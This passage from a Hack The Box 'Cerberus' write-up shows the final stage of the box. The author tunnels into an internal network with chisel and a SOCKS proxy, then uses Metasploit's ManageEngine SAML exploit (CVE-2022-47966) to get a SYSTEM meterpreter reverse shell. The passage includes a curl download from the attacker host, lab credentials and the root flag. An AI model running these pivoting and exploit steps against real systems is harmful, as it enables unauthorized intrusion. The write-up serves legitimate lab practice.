2023/05/01 08:45:17 server: Fingerprint /ouUxxvtKDEl+5tBsDCw23XZj9LHxliOGD6mTJsFzuQ=
2023/05/01 08:45:17 server: Listening on http://0.0.0.0:9999
2023/05/01 08:50:25 server: session#1: tun: proxy#R:9251=>172.16.22.1:9251: Listening
```

Get the .exe version of chisel and upload it to the Windows box. Could just have used Evil-WinRM's built-in 'upload' now, but I forgot it was a thing and went with curl:

```powershell
*Evil-WinRM* PS C:\Users\matthew\Documents> curl 10.10.14.76/chisel.exe -o chisel.exe
```

```powershell
*Evil-WinRM* PS C:\Users\matthew\Documents> ./chisel.exe client --max-retry-count=1 10.10.14.76:9999 R:9251:172.16.22.1:9251
```

This did... something, as I could hit the page in Firefox now...

![Screenshot showing loading ManageEngine endpoint in Firefox](https://hackmd.io/_uploads/B1XrOEuEh.png)

...but after a bit of loading resources it tries to redirect to dc.cerberus.local (taking its time about it) with some params that made me think it had worked at first, but then it failed to display the page:

![Screenshot showing loading ManageEngine endpoint in Firefox](https://hackmd.io/_uploads/SySiONOE3.png)

Or maybe it should be:

```powershell
./chisel.exe client --max-retry-count=1 10.10.14.76:9999 R:1080:socks
```

Still couldn't hit it... edited /etc/hosts to point everything at localhost:

```bash
#10.129.229.4 cerberus.local incinga.cerberus.local
127.0.0.1 cerberus.local icinga.cerberus.local dc.cerberus.local
```

*Still* couldn't hit it, but then it occurred to me to add the SOCKS proxy in Firefox 🤦‍♂️

![Screenshot of FoxyProxy settings adding 127.0.0.1:1080 as SOCKS5 proxy](https://hackmd.io/_uploads/Sk_atEuE2.png)

Then navigating to https://dc.cerberus.local:9251 and I'm finally in...
![Screenshot of successfully hitting the login page](https://hackmd.io/_uploads/HJwb9N_Vh.png)

Logged in with matthew@cerberus.local:147258369:

![Screenshot of page once authenticated](https://hackmd.io/_uploads/B1bU5EuE3.png)

Not much to see on the page, but there's a GUID in the URL that becomes important for the next exploit:

```
67a8d101690402dc6a6744b8fc8a7ca1acf88b2f
```

Fired up Metasploit for this last step:

```bash
┌──(kali㉿kali)-[~/HackTheBox/Machines/Cerberus]
└─$ msfconsole

       =[ metasploit v6.3.13-dev                          ]
+ -- --=[ 2311 exploits - 1205 auxiliary - 412 post       ]
+ -- --=[ 975 payloads - 46 encoders - 11 nops            ]
+ -- --=[ 9 evasion                                       ]

Metasploit tip: View advanced module options with advanced
Metasploit Documentation: https://docs.metasploit.com/

msf6 > search manageengine
```

![Screenshot of search results in msfconsole for manageengine](https://hackmd.io/_uploads/S1_ZoEOV3.png)

Realised at this point (read: after a *lot* more failing) that I had to set the SOCKS proxy for MSF to see the service, so backed out and edited proxychains4.conf:

```bash
[ProxyList]
# add proxy here ...
# meanwile
# defaults set to "tor"
#socks4  127.0.0.1 9050
socks5  127.0.0.1 1080
```

Then:

```bash
┌──(kali㉿kali)-[~/HackTheBox/Machines/Cerberus]
└─$ sudo proxychains4 -q bash
[sudo] password for kali:

┌──(root㉿kali)-[/home/kali/HackTheBox/Machines/Cerberus]
└─# msfconsole

       =[ metasploit v6.3.13-dev                          ]
+ -- --=[ 2311 exploits - 1205 auxiliary - 412 post       ]
+ -- --=[ 975 payloads - 46 encoders - 11 nops            ]
+ -- --=[ 9 evasion                                       ]

Metasploit tip: Metasploit can be configured at startup, see msfconsole --help to learn more
Metasploit Documentation: https://docs.metasploit.com/

msf6 >
```

```bash
msf6 > use exploit/multi/http/manageengine_adselfservice_plus_saml_rce_cve_2022_47966
[*] Using configured payload cmd/windows/powershell/meterpreter/reverse_tcp
msf6 exploit(multi/http/manageengine_adselfservice_plus_saml_rce_cve_2022_47966) > options
<SNIP>
Module options (exploit/multi/http/manageengine_adselfservice_plus_saml_rce_cve_2022_47966):

   Name         Current Setting                               Required  Description
   ----         ---------------                               --------  -----------
   GUID         67a8d101690402dc6a6744b8fc8a7ca1acf88b2f      yes       The SAML endpoint GUID
   ISSUER_URL   http://dc.cerberus.local/adfs/services/trust  yes       The Issuer URL used by the Identity Provider which has been configured as the SAML authentication provider for the target server
   Proxies                                                    no        A proxy chain of format type:host:port[,type:host:port][...]
   RELAY_STATE                                                no        The Relay State. Default is "http(s)://<rhost>:<rport>/samlLogin/LoginAuth"
   RHOSTS       172.16.22.1                                   yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
   RPORT        9251                                          yes       The target port (TCP)
   SSL          true                                          no        Negotiate SSL/TLS for outgoing connections
   SSLCert                                                    no        Path to a custom SSL certificate (default is randomly generated)
   TARGETURI    /samlLogin                                    yes       The SAML endpoint URL
   URIPATH                                                    no        The URI to use for this exploit (default is random)
   VHOST                                                      no        HTTP server virtual host


   When CMDSTAGER::FLAVOR is one of auto,tftp,wget,curl,fetch,lwprequest,psh_invokewebrequest,ftp_http:

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SRVHOST  0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
   SRVPORT  8080             yes       The local port to listen on.

Payload options (cmd/windows/powershell/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     10.10.14.76      yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   1   Windows Command


View the full module info with the info, or info -d command.

msf6 exploit(multi/http/manageengine_adselfservice_plus_saml_rce_cve_2022_47966) > exploit

[*] Started reverse TCP handler on 10.10.14.76:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[!] The service is running, but could not be validated.
[*] Sending stage (175686 bytes) to 10.129.229.4
[*] Meterpreter session 2 opened (10.10.14.76:4444 -> 10.129.229.4:51935) at 2023-05-01 11:52:38 -0400

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM    <---- :)
meterpreter > pwd
C:\Program Files (x86)\ManageEngine\ADSelfService Plus\bin
meterpreter > cd C:/Users/Administrator/Desktop
meterpreter > ls
Listing: C:\Users\Administrator\Desktop
=======================================

Mode              Size  Type  Last modified              Name
----              ----  ----  -------------              ----
100666/rw-rw-rw-  282   fil   2023-03-06 10:00:00 -0500  desktop.ini
100444/r--r--r--  34    fil   2023-05-01 06:50:45 -0400  root.txt

meterpreter > cat root.txt
9473401241e600a4295dda7301d245a9
meterpreter >
```

Note: tried calling MSF's "shell" here to get a proper system shell, but for some reason it was just hanging indefinitely; couldn't find a quick answer other than updating the MSF version so, meh.

Overall, a really fun box and a great opportunity to practice pivoting while keeping the exploits themselves easy enough to work with. Can't speak from experience, but tempted to call this one "real-world" rather than "CTF-like".
It wouldn't surprise me if this one ends up on the [TJ Null List](https://docs.google.com/spreadsheets/u/1/d/1dwSMIAPIam0PuRBkCiDI88pU3yzrqqHkDtBngUHNCw8/htmlview#) (though it would also scare me a little given how long it took me to get through it... don't fancy knocking five of these out inside of 24 hours for the OSCP 😱... getting better though... slowly.)